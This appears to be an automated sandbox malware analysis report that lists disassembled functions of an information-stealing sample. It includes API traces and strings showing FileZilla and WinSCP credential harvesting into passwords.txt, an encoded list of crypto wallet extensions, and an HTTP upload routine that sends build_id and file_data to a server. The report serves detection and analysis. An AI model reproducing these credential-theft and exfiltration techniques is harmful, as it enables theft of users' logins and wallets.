                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1206570057-0
                                                                                                                                                                                          • Opcode ID: 924140a5f2f6178831a2bce7ca3e64494bc087bc37996c704d7bbe364f3cc3dd
                                                                                                                                                                                          • Instruction ID: 882d6e780c8f7eb012e1d084ee3f10c02d38d0f680ef57be9550e8df0b60cb5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 924140a5f2f6178831a2bce7ca3e64494bc087bc37996c704d7bbe364f3cc3dd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DD017B6200304BBEB409B95DC0DF8F7AACEB84726F000055BA46D2290DAB899488B20
                                                                                                                                                                                          Function 00030FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoSystemwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2452939696-0
                                                                                                                                                                                          • Opcode ID: a576a773c9474825907f4a83abcf19b225c0569ea24b85d329d9f3d0002926fa
                                                                                                                                                                                          • Instruction ID: 3642b16ef5a899363e0dd8db45069c081ea345d4bd0d0daf47c454d3f4cbb172
                                                                                                                                                                                          • Opcode Fuzzy Hash: a576a773c9474825907f4a83abcf19b225c0569ea24b85d329d9f3d0002926fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAE06D7091020D9BCF11DF60EC59ADE77BCEB08204F4105E69509A7180D670AB898B51
                                                                                                                                                                                          Function 000214AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00021503,avghookx.dll,00038544), ref: 000214DF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                          • Opcode ID: 858fa21d12e5f9ee989d303a28cb26d939173710bace609501ae85725099d138
                                                                                                                                                                                          • Instruction ID: 3d6a6a44383f57e2f43a61d0bf6b101913d8a89fc9af01851e916e5627a5375a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 858fa21d12e5f9ee989d303a28cb26d939173710bace609501ae85725099d138
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F05832A00160EBCF20DF59E804AAAFBB8EB53761F256054E809B3600C330ED11AA98
                                                                                                                                                                                          Function 00025482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 29 25482-25593 call 304e7 call 30519 call 24ab6 call 31e5d lstrlenA call 31e5d call 304e7 * 4 StrCmpCA 48 25595 29->48 49 2559b-255a1 29->49 48->49 50 255a3-255b8 InternetOpenA 49->50 51 255be-256ce call 31c4a call 305c7 call 3058d call 22920 * 2 call 30609 call 305c7 call 30609 call 3058d call 22920 * 3 call 30609 call 305c7 call 3058d call 22920 * 2 InternetConnectA 49->51 50->51 52 25e64-25eec call 22920 * 4 call 30519 call 22920 * 3 50->52 51->52 118 256d4-25712 HttpOpenRequestA 51->118 86 25eee-25f2e call 22920 * 6 call 3d016 52->86 119 25e58-25e5e InternetCloseHandle 118->119 120 25718-2571e 118->120 119->52 121 25720-25736 InternetSetOptionA 120->121 122 2573c-25d77 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 47050 lstrlenA call 47050 lstrlenA * 2 call 47050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 25db5-25dc5 call 31afd 122->309 310 25d79-25db0 call 304e7 call 22920 * 3 122->310 315 25dcb-25dd0 309->315 316 25f2f 309->316 310->86 319 25e11-25e2e InternetReadFile 315->319 321 25dd2-25dda 319->321 322 25e30-25e43 StrCmpCA 319->322 321->322 326 25ddc-25e0c call 30609 call 3058d call 22920 321->326 324 25e45-25e46 ExitProcess 322->324 325 25e4c-25e52 InternetCloseHandle 322->325 325->119 326->319
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025519
                                                                                                                                                                                            • Part of subcall function 00031E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0027E908,?,?,?,000328A1,?,?,00000000), ref: 00031E7D
                                                                                                                                                                                            • Part of subcall function 00031E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,000328A1,?,?,00000000), ref: 00031E8A
                                                                                                                                                                                            • Part of subcall function 00031E5D: HeapAlloc.KERNEL32(00000000,?,?,?,000328A1,?,?,00000000), ref: 00031E91
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056986,0005697B,0005697A,0005696F), ref: 00025588
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000255AA
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000256C0
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00025704
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00025736
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,",file_data,00057850,------,00057844,?,",00057838,------,0005782C,744fd163d6d4e0ac37e4032bcbfbb6af,",build_id,00057814,------), ref: 00025C67
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025C7A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00025C92
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00025C99
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025CA6
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00025CB4
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?), ref: 00025CC9
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00025CD6
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025CE4
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00025CF2
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00025D05
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00025D1A
                                                                                                                                                                                          • HttpSendRequestA.WININET(?,?,00000000), ref: 00025D2D
                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00025D6F
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 00025E26
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,block), ref: 00025E3B
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00025E46
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                          • String ID: ------$"$"$"$"$--$------$------$------$------$744fd163d6d4e0ac37e4032bcbfbb6af$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                          • API String ID: 2638065154-2635783120
                                                                                                                                                                                          • Opcode ID: 14a1b8bb39d828402a4be534c6e86a529431dc44105bad4d06540ef40122a429
                                                                                                                                                                                          • Instruction ID: 2cf70c0880cfd0ae76f2136c8e7e911f51af58ca857bfc210b6025f217349fff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14a1b8bb39d828402a4be534c6e86a529431dc44105bad4d06540ef40122a429
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B42C872D5116DABDF21EB60EC46ADDB3B8BF04300F4585E1A948B7112DA706FCA9F90
                                                                                                                                                                                          Function 0002E6CF Relevance: 72.0, APIs: 30, Strings: 11, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 0002E77E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx,00056912,0005690F,0005690E,0005690D), ref: 0002E7C4
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002E7CB
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 0002E7DF
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E7EA
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 0002E81E
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E829
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 0002E857
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E862
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0002E890
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E89B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002E901
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002E915
                                                                                                                                                                                          • lstrlenA.KERNEL32(0002ECBC), ref: 0002EA3D
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0002E71F
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 0002E7BD
                                                                                                                                                                                          • <Port>, xrefs: 0002E818
                                                                                                                                                                                          • <User>, xrefs: 0002E851
                                                                                                                                                                                          • <Pass encoding="base64">, xrefs: 0002E88A
                                                                                                                                                                                          • Soft: FileZilla, xrefs: 0002E948
                                                                                                                                                                                          • Password: , xrefs: 0002E9AE
                                                                                                                                                                                          • <Host>, xrefs: 0002E7D9
                                                                                                                                                                                          • Host: , xrefs: 0002E954
                                                                                                                                                                                          • passwords.txt, xrefs: 0002EA4D
                                                                                                                                                                                          • Login: , xrefs: 0002E98C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 4146028692-1548688356
                                                                                                                                                                                          • Opcode ID: a07c1bb5225821098ab2054c548edf8bd496c5ac73e8a459bc4023d8bcc3a28e
                                                                                                                                                                                          • Instruction ID: 6d1fcb36c0681bd6a9c419d84dbf7b92fbea3be01544b2019a04b3579b2cdac1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a07c1bb5225821098ab2054c548edf8bd496c5ac73e8a459bc4023d8bcc3a28e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DA1F232941219BBCF01BBE0FC5B9DE7B78AF18701F514460FA09B7152DB71AA49CBA1
                                                                                                                                                                                          Function 0002E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1B7
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1D7
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1E8
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1F9
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E22D
                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0002E25E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E276
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E29D
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E2BD
                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0002E2E0
                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,000568E7), ref: 0002E379
